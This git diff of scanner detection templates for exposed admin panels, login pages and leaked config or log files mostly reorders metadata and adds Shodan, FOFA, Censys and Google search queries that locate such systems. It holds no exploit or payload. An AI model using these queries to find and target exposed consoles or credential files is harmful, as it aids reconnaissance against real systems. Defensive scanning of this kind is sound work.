a/http/exposed-panels/wowza-streaming-engine.yaml +++ b/http/exposed-panels/wowza-streaming-engine.yaml @@ -9,9 +9,14 @@ info: cpe: cpe:2.3:a:wowza:streaming_engine:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: streaming_engine - shodan-query: http.title:"Manager" product:"Wowza Streaming Engine" vendor: wowza + product: streaming_engine + shodan-query: + - http.title:"Manager" product:"Wowza Streaming Engine" + - http.title:"manager" product:"wowza streaming engine" + - cpe:"cpe:2.3:a:wowza:streaming_engine" + fofa-query: title="manager" product:"wowza streaming engine" + google-query: intitle:"manager" product:"wowza streaming engine" tags: panel,wowza http: diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml index 40b5c97e73..e08437bed0 100644 --- a/http/exposed-panels/ws_ftp-server-web-transfer.yaml +++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml @@ -9,12 +9,24 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - censys-query: services.http.request.uri="*/ThinClient/WTM/public/index.html" - max-request: 1 - product: ws_ftp - shodan-query: http.title:"WS_FTP Server Web Transfer" - vendor: progress verified: true + max-request: 1 + vendor: progress + product: ws_ftp + shodan-query: + - http.title:"WS_FTP Server Web Transfer" + - ws_ftp port:22 + - http.title:"ad hoc transfer" + - http.title:"ws_ftp server web transfer" + censys-query: + - services.http.request.uri="*/ThinClient/WTM/public/index.html" + - services.http.request.uri="*/thinclient/wtm/public/index.html" + fofa-query: + - title="ws_ftp server web transfer" + - title="ad hoc transfer" + google-query: + - intitle:"ws_ftp server web transfer" + - intitle:"ad hoc transfer" tags: panel,ws_ftp,progress http: diff --git a/http/exposed-panels/wso2-management-console.yaml b/http/exposed-panels/wso2-management-console.yaml index e77bcd1e5b..2c0b29b2de 100644 --- a/http/exposed-panels/wso2-management-console.yaml +++ b/http/exposed-panels/wso2-management-console.yaml @@ -13,9 +13,11 @@ info: cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 product: api_manager shodan-query: http.favicon.hash:1398055326 - vendor: wso2 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: panel,wso2,edb http: diff --git a/http/exposed-panels/xeams-admin-console.yaml b/http/exposed-panels/xeams-admin-console.yaml index 9eb12620ce..f941132692 100644 --- a/http/exposed-panels/xeams-admin-console.yaml +++ b/http/exposed-panels/xeams-admin-console.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:synametrics:xeams:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: xeams - shodan-query: http.title:"Xeams Admin" - vendor: synametrics verified: true + max-request: 2 + vendor: synametrics + product: xeams + shodan-query: + - http.title:"Xeams Admin" + - http.title:"xeams admin" + fofa-query: title="xeams admin" + google-query: intitle:"xeams admin" tags: panel,xeams,admin,console,synametrics http: diff --git a/http/exposed-panels/xenmobile-login.yaml b/http/exposed-panels/xenmobile-login.yaml index 40b99313ad..ba1f7e9040 100644 --- a/http/exposed-panels/xenmobile-login.yaml +++ b/http/exposed-panels/xenmobile-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:citrix:xenmobile_device_manager_mdm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: xenmobile_device_manager_mdm vendor: citrix + product: xenmobile_device_manager_mdm tags: panel,edb,citrix http: diff --git a/http/exposed-panels/xfinity-panel.yaml b/http/exposed-panels/xfinity-panel.yaml index 1b8089c067..0cf468a3b0 100644 --- a/http/exposed-panels/xfinity-panel.yaml +++ b/http/exposed-panels/xfinity-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"xfinity" - verified: true tags: panel,xfinity http: diff --git a/http/exposed-panels/xibocms-login.yaml b/http/exposed-panels/xibocms-login.yaml index 2635eb7a35..d0e53a3e14 100644 --- a/http/exposed-panels/xibocms-login.yaml +++ b/http/exposed-panels/xibocms-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"/xibosignage/xibo-cms" - verified: true tags: panel,xibocms http: diff --git a/http/exposed-panels/xnat-login.yaml b/http/exposed-panels/xnat-login.yaml index 17c4e7f9f7..527c60565b 100644 --- a/http/exposed-panels/xnat-login.yaml +++ b/http/exposed-panels/xnat-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"xnat" - verified: true tags: xnat,panel http: diff --git a/http/exposed-panels/xoops/xoops-installation-wizard.yaml b/http/exposed-panels/xoops/xoops-installation-wizard.yaml index ec0466e638..1bc014c471 100644 --- a/http/exposed-panels/xoops/xoops-installation-wizard.yaml +++ b/http/exposed-panels/xoops/xoops-installation-wizard.yaml @@ -9,8 +9,8 @@ info: cpe: cpe:2.3:a:xoops:xoops:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: xoops vendor: xoops + product: xoops tags: panel,xoops http: diff --git a/http/exposed-panels/xvr-login.yaml b/http/exposed-panels/xvr-login.yaml index cf2b55e239..557cca2da2 100644 --- a/http/exposed-panels/xvr-login.yaml +++ b/http/exposed-panels/xvr-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:h:dahuasecurity:xvr5xxx:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: xvr5xxx - shodan-query: http.title:"XVR LOGIN" vendor: dahuasecurity + product: xvr5xxx + shodan-query: + - http.title:"XVR LOGIN" + - http.title:"xvr login" + fofa-query: title="xvr login" + google-query: intitle:"xvr login" tags: panel,xvr,dahuasecurity http: diff --git a/http/exposed-panels/xweb500-panel.yaml b/http/exposed-panels/xweb500-panel.yaml index 55454875b4..f52a33d8ca 100644 --- a/http/exposed-panels/xweb500-panel.yaml +++ b/http/exposed-panels/xweb500-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: inurl:"xweb500.cgi" max-request: 1 + google-query: inurl:"xweb500.cgi" tags: panel,xweb500 http: diff --git a/http/exposed-panels/xxljob-panel.yaml b/http/exposed-panels/xxljob-panel.yaml index b201c80c37..6dd139154f 100644 --- a/http/exposed-panels/xxljob-panel.yaml +++ b/http/exposed-panels/xxljob-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: xuxueli product: xxl-job shodan-query: http.favicon.hash:1691956220 - vendor: xuxueli - verified: true + fofa-query: icon_hash=1691956220 tags: panel,xxljob,login,xuxueli http: diff --git a/http/exposed-panels/yarn-manager-exposure.yaml b/http/exposed-panels/yarn-manager-exposure.yaml index 3925658336..7ca14b6484 100644 --- a/http/exposed-panels/yarn-manager-exposure.yaml +++ b/http/exposed-panels/yarn-manager-exposure.yaml @@ -9,8 +9,8 @@ info: cpe: cpe:2.3:a:apache:hadoop:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: hadoop vendor: apache + product: hadoop tags: panel,apache,yarn,exposure http: diff --git a/http/exposed-panels/yellowfin-panel.yaml b/http/exposed-panels/yellowfin-panel.yaml index 59f7f84e59..cfc3f6b027 100644 --- a/http/exposed-panels/yellowfin-panel.yaml +++ b/http/exposed-panels/yellowfin-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: info metadata: + verified: true max-request: 1 shodan-query: title:"Yellowfin Information Collaboration" - verified: true tags: yellowfin,panel,login http: diff --git a/http/exposed-panels/yzmcms-panel.yaml b/http/exposed-panels/yzmcms-panel.yaml index f3a0b41d66..accfe1e223 100644 --- a/http/exposed-panels/yzmcms-panel.yaml +++ b/http/exposed-panels/yzmcms-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:yzmcms:yzmcms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: yzmcms - shodan-query: http.title:"YzmCMS" vendor: yzmcms + product: yzmcms + shodan-query: + - http.title:"YzmCMS" + - http.title:"yzmcms" + fofa-query: title="yzmcms" + google-query: intitle:"yzmcms" tags: panel,yzmcms,login http: diff --git a/http/exposed-panels/zabbix-server-login.yaml b/http/exposed-panels/zabbix-server-login.yaml index 763599a3c7..ef1bea293d 100644 --- a/http/exposed-panels/zabbix-server-login.yaml +++ b/http/exposed-panels/zabbix-server-login.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zabbix - shodan-query: http.title:"zabbix-server" vendor: zabbix + product: zabbix + shodan-query: + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + - http.favicon.hash:892542951 + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" + google-query: intitle:"zabbix-server" tags: panel,zabbix http: diff --git a/http/exposed-panels/zblog-exposed-admin-panel.yaml b/http/exposed-panels/zblog-exposed-admin-panel.yaml index 3fe134b539..3ee91231d5 100644 --- a/http/exposed-panels/zblog-exposed-admin-panel.yaml +++ b/http/exposed-panels/zblog-exposed-admin-panel.yaml @@ -12,11 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zblogcn:zblogphp:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: zblogcn product: zblogphp shodan-query: http.title:zblog - vendor: zblogcn - verified: true + fofa-query: title=zblog + google-query: intitle:zblog tags: zblog,panel,zblogcn http: diff --git a/http/exposed-panels/zenario-login-panel.yaml b/http/exposed-panels/zenario-login-panel.yaml index 44740e72f4..8ea675cd3b 100644 --- a/http/exposed-panels/zenario-login-panel.yaml +++ b/http/exposed-panels/zenario-login-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:tribalsystems:zenario:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zenario vendor: tribalsystems + product: zenario tags: panel,zenario,tribalsystems http: diff --git a/http/exposed-panels/zentao-detect.yaml b/http/exposed-panels/zentao-detect.yaml index b69cf973f9..e2367be84e 100644 --- a/http/exposed-panels/zentao-detect.yaml +++ b/http/exposed-panels/zentao-detect.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:easycorp:zentao:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zentao vendor: easycorp + product: zentao tags: panel,easycorp http: diff --git a/http/exposed-panels/zeroshell-login.yaml b/http/exposed-panels/zeroshell-login.yaml index 98e2c299bb..ec9e2ab6a3 100644 --- a/http/exposed-panels/zeroshell-login.yaml +++ b/http/exposed-panels/zeroshell-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:zeroshell:zeroshell:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zeroshell - shodan-query: http.title:"ZeroShell" vendor: zeroshell + product: zeroshell + shodan-query: + - http.title:"ZeroShell" + - http.title:"zeroshell" + fofa-query: title="zeroshell" + google-query: intitle:"zeroshell" tags: panel,zeroshell http: diff --git a/http/exposed-panels/zimbra-web-client.yaml b/http/exposed-panels/zimbra-web-client.yaml index 58c5a6e154..b0d5175a53 100644 --- a/http/exposed-panels/zimbra-web-client.yaml +++ b/http/exposed-panels/zimbra-web-client.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: zimbra_collaboration_suite - shodan-query: http.title:"Zimbra Web Client Sign In" - vendor: synacor verified: true + max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + shodan-query: + - http.title:"Zimbra Web Client Sign In" + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: edb,panel,zimbra,synacor http: diff --git a/http/exposed-panels/zimbra-web-login.yaml b/http/exposed-panels/zimbra-web-login.yaml index 3f839da8a8..edadc3042d 100644 --- a/http/exposed-panels/zimbra-web-login.yaml +++ b/http/exposed-panels/zimbra-web-login.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: zimbra_collaboration_suite - shodan-query: http.title:"Zimbra Collaboration Suite" - vendor: synacor verified: true + max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + shodan-query: + - http.title:"Zimbra Collaboration Suite" + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: panel,zimbra,synacor http: diff --git a/http/exposed-panels/zipkin-exposure.yaml b/http/exposed-panels/zipkin-exposure.yaml index 133d64a47f..975161d013 100644 --- a/http/exposed-panels/zipkin-exposure.yaml +++ b/http/exposed-panels/zipkin-exposure.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"webpackJsonpzipkin-lens" - verified: true tags: panel,zipkin http: diff --git a/http/exposed-panels/zoho/manageengine-adaudit.yaml b/http/exposed-panels/zoho/manageengine-adaudit.yaml index aac6d3f365..6ef1cee351 100644 --- a/http/exposed-panels/zoho/manageengine-adaudit.yaml +++ b/http/exposed-panels/zoho/manageengine-adaudit.yaml @@ -14,11 +14,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: manageengine_adaudit_plus - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" - vendor: zohocorp verified: true + max-request: 2 + vendor: zohocorp + product: manageengine_adaudit_plus + shodan-query: + - http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + - http.title:"adaudit plus" || http.title:"manageengine - admanager plus" + fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" + google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-adselfservice.yaml b/http/exposed-panels/zoho/manageengine-adselfservice.yaml index c124acd633..804cb947ab 100644 --- a/http/exposed-panels/zoho/manageengine-adselfservice.yaml +++ b/http/exposed-panels/zoho/manageengine-adselfservice.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: manageengine_adselfservice_plus - shodan-query: http.title:"ADSelfService Plus" - vendor: zohocorp verified: true + max-request: 2 + vendor: zohocorp + product: manageengine_adselfservice_plus + shodan-query: + - http.title:"ADSelfService Plus" + - http.title:"adselfservice plus" + - http.title:"manageengine" + fofa-query: + - title="adselfservice plus" + - title="manageengine" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-analytics.yaml b/http/exposed-panels/zoho/manageengine-analytics.yaml index 243c09b5d0..46e89181b2 100644 --- a/http/exposed-panels/zoho/manageengine-analytics.yaml +++ b/http/exposed-panels/zoho/manageengine-analytics.yaml @@ -10,10 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_analytics_plus:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ZOHO-流量管理" max-request: 1 - product: manageengine_analytics_plus vendor: zohocorp + product: manageengine_analytics_plus + fofa-query: + - app="ZOHO-流量管理" + - app="zoho-流量管理" + - title="apex it help desk" + shodan-query: http.title:"apex it help desk" + google-query: intitle:"apex it help desk" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml index f7f37638fb..b059bf9028 100644 --- a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml +++ b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml @@ -11,9 +11,15 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_analytics_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_analytics_plus - shodan-query: http.title:"APEX IT Help Desk" vendor: zohocorp + product: manageengine_analytics_plus + shodan-query: + - http.title:"APEX IT Help Desk" + - http.title:"apex it help desk" + fofa-query: + - app="zoho-流量管理" + - title="apex it help desk" + google-query: intitle:"apex it help desk" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-applications-manager.yaml b/http/exposed-panels/zoho/manageengine-applications-manager.yaml index a1228a5e92..2e2cb5326e 100644 --- a/http/exposed-panels/zoho/manageengine-applications-manager.yaml +++ b/http/exposed-panels/zoho/manageengine-applications-manager.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_applications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_applications_manager vendor: zohocorp + product: manageengine_applications_manager tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml index 7f67a3c494..7f4579dec3 100644 --- a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml +++ b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_assetexplorer:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_assetexplorer - shodan-query: http.title:"ManageEngine AssetExplorer" vendor: zohocorp + product: manageengine_assetexplorer + shodan-query: + - http.title:"ManageEngine AssetExplorer" + - http.title:"manageengine assetexplorer" + fofa-query: title="manageengine assetexplorer" + google-query: intitle:"manageengine assetexplorer" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-desktop.yaml b/http/exposed-panels/zoho/manageengine-desktop.yaml index 604f338f4f..e5fa1e3801 100644 --- a/http/exposed-panels/zoho/manageengine-desktop.yaml +++ b/http/exposed-panels/zoho/manageengine-desktop.yaml @@ -11,9 +11,15 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_desktop_central - shodan-query: http.title:"ManageEngine Desktop Central 10" vendor: zohocorp + product: manageengine_desktop_central + shodan-query: + - http.title:"ManageEngine Desktop Central 10" + - http.title:"manageengine desktop central 10" + fofa-query: + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" + google-query: intitle:"manageengine desktop central 10" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-network-config.yaml b/http/exposed-panels/zoho/manageengine-network-config.yaml index da719f577c..eb89d86b7a 100644 --- a/http/exposed-panels/zoho/manageengine-network-config.yaml +++ b/http/exposed-panels/zoho/manageengine-network-config.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: manageengine_network_configuration_manager - shodan-query: http.title:"Network Configuration Manager" - vendor: zohocorp verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_network_configuration_manager + shodan-query: + - http.title:"Network Configuration Manager" + - http.title:"network configuration manager" + fofa-query: title="network configuration manager" + google-query: intitle:"network configuration manager" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-opmanager.yaml b/http/exposed-panels/zoho/manageengine-opmanager.yaml index cc8ccf461f..0c777e9932 100644 --- a/http/exposed-panels/zoho/manageengine-opmanager.yaml +++ b/http/exposed-panels/zoho/manageengine-opmanager.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_opmanager - shodan-query: http.title:"OpManager Plus" vendor: zohocorp + product: manageengine_opmanager + shodan-query: + - http.title:"OpManager Plus" + - http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-servicedesk.yaml b/http/exposed-panels/zoho/manageengine-servicedesk.yaml index 9d0cc51280..027122746a 100644 --- a/http/exposed-panels/zoho/manageengine-servicedesk.yaml +++ b/http/exposed-panels/zoho/manageengine-servicedesk.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_servicedesk_plus - shodan-query: http.title:"ManageEngine ServiceDesk Plus" vendor: zohocorp + product: manageengine_servicedesk_plus + shodan-query: + - http.title:"ManageEngine ServiceDesk Plus" + - http.title:"manageengine servicedesk plus" + fofa-query: title="manageengine servicedesk plus" + google-query: intitle:"manageengine servicedesk plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-supportcenter.yaml b/http/exposed-panels/zoho/manageengine-supportcenter.yaml index 6e98304342..ab6c4b7b58 100644 --- a/http/exposed-panels/zoho/manageengine-supportcenter.yaml +++ b/http/exposed-panels/zoho/manageengine-supportcenter.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_supportcenter_plus - shodan-query: http.title:"ManageEngine SupportCenter Plus" vendor: zohocorp + product: manageengine_supportcenter_plus + shodan-query: + - http.title:"ManageEngine SupportCenter Plus" + - http.title:"manageengine supportcenter plus" + fofa-query: title="manageengine supportcenter plus" + google-query: intitle:"manageengine supportcenter plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoneminder-login.yaml b/http/exposed-panels/zoneminder-login.yaml index 0bfaba5d20..71933fb35b 100644 --- a/http/exposed-panels/zoneminder-login.yaml +++ b/http/exposed-panels/zoneminder-login.yaml @@ -11,8 +11,10 @@ info: cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zoneminder vendor: zoneminder + product: zoneminder + shodan-query: http.html:"zm - login" + fofa-query: body="zm - login" tags: panel,zoneminder http: diff --git a/http/exposed-panels/zte-panel.yaml b/http/exposed-panels/zte-panel.yaml index 5826ede43b..cf694cf1e1 100644 --- a/http/exposed-panels/zte-panel.yaml +++ b/http/exposed-panels/zte-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"ZTE Corporation" - verified: true tags: panel,zte http: diff --git a/http/exposed-panels/zyxel-router-panel.yaml b/http/exposed-panels/zyxel-router-panel.yaml index 71d7f19ef8..18298e34c0 100644 --- a/http/exposed-panels/zyxel-router-panel.yaml +++ b/http/exposed-panels/zyxel-router-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:zyxel:nr5101:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: nr5101 - shodan-query: title:"Web-Based Configurator" html:"zyxel" - vendor: zyxel verified: true + max-request: 2 + vendor: zyxel + product: nr5101 + shodan-query: + - title:"Web-Based Configurator" html:"zyxel" + - http.title:"web-based configurator" html:"zyxel" + fofa-query: title="web-based configurator" html:"zyxel" + google-query: intitle:"web-based configurator" html:"zyxel" tags: panel,zyxel,router,iot http: diff --git a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml index fe856ff034..de2fd1c4a4 100644 --- a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml +++ b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-440644339 - verified: true tags: panel,xyxel,firewall http: diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index 3b2885a1d8..11a5875c58 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -7,11 +7,14 @@ info: classification: cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vmg1312-b10d_firmware - shodan-query: http.html:"VMG1312-B10D" - vendor: zyxel verified: true + max-request: 1 + vendor: zyxel + product: vmg1312-b10d_firmware + shodan-query: + - http.html:"VMG1312-B10D" + - http.html:"vmg1312-b10d" + fofa-query: body="vmg1312-b10d" tags: tech,zyxel,modem,router,panel http: diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 28b8bff696..9414b917bb 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -5,9 +5,9 @@ info: author: princechaddha severity: info metadata: + verified: true max-request: 1 shodan-query: http.html:"VSG1432-B101" - verified: true tags: tech,zyxel,modem,router,panel http: diff --git a/http/exposures/apis/drupal-jsonapi-user-listing.yaml b/http/exposures/apis/drupal-jsonapi-user-listing.yaml index 309c6b3ac0..dd00ee2288 100644 --- a/http/exposures/apis/drupal-jsonapi-user-listing.yaml +++ b/http/exposures/apis/drupal-jsonapi-user-listing.yaml @@ -14,7 +14,11 @@ info: metadata: verified: true max-request: 1 - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" + product: drupal + vendor: drupal tags: drupal,exposure http: diff --git a/http/exposures/configs/deployment-ini.yaml b/http/exposures/configs/deployment-ini.yaml index fe82b4ba98..928e1ca110 100644 --- a/http/exposures/configs/deployment-ini.yaml +++ b/http/exposures/configs/deployment-ini.yaml @@ -7,13 +7,14 @@ info: description: | Config file for "FTP deployment" utility usually contains server's FTP credentials in plain text. remediation: | - Delete the config file from server & add it to `ignore` section of the deployment file. Or block access to the file using `.htaccess` on the server. + Delete the config file from server & add it to `ignore` section of the deployment file. Or block access to the file using `.htaccess` on the server. reference: - https://github.com/dg/ftp-deployment metadata: + max-request: 12 vendor: dg - product: ftp-deployment - tags: config,exposure + product: "ftp-deployment" + tags: config,exposure,dg http: - method: GET diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 5d26689d69..b1e884bb52 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -43,7 +43,7 @@ info: cvss-score: 7.5 metadata: max-request: 89 - tags: files,database,exposure,sqlite,sqlite3,fuzz + tags: files,database,exposure,sqlite,sqlite3,fuzz,sqli http: - method: GET diff --git a/http/exposures/files/ht-deployment.yaml b/http/exposures/files/ht-deployment.yaml index 899a54e4f8..0ce2449f51 100644 --- a/http/exposures/files/ht-deployment.yaml +++ b/http/exposures/files/ht-deployment.yaml @@ -15,10 +15,10 @@ info: cvss-score: 7.5 metadata: verified: true + max-request: 2 vendor: dg product: ftp-deployment - max-request: 2 - tags: files,exposure,php,deployment,cache + tags: files,exposure,php,deployment,cache,dg http: - method: GET diff --git a/http/exposures/files/wordpress-readme-file.yaml b/http/exposures/files/wordpress-readme-file.yaml index 0a0e6b8abf..7d564bff2e 100644 --- a/http/exposures/files/wordpress-readme-file.yaml +++ b/http/exposures/files/wordpress-readme-file.yaml @@ -7,7 +7,11 @@ info: metadata: verified: true max-request: 3 - shodan-query: http.component:"wordpress" + shodan-query: + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" + product: wordpress + vendor: wordpress tags: exposure,wordpress,wp,readme,files http: diff --git a/http/exposures/logs/milesight-system-log.yaml b/http/exposures/logs/milesight-system-log.yaml index e916e6b72e..fd92776987 100644 --- a/http/exposures/logs/milesight-system-log.yaml +++ b/http/exposures/logs/milesight-system-log.yaml @@ -13,6 +13,9 @@ info: max-request: 1 shodan-query: http.html:rt_title google-query: '"/lang/log/system" ext:log' + product: ur5x_firmware + vendor: milesight + fofa-query: body=rt_title tags: milesight,log,exposure http: diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index df817453b6..29b11d3125 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzz,cache + tags: fuzz,cache,fuzzing http: - raw: diff --git 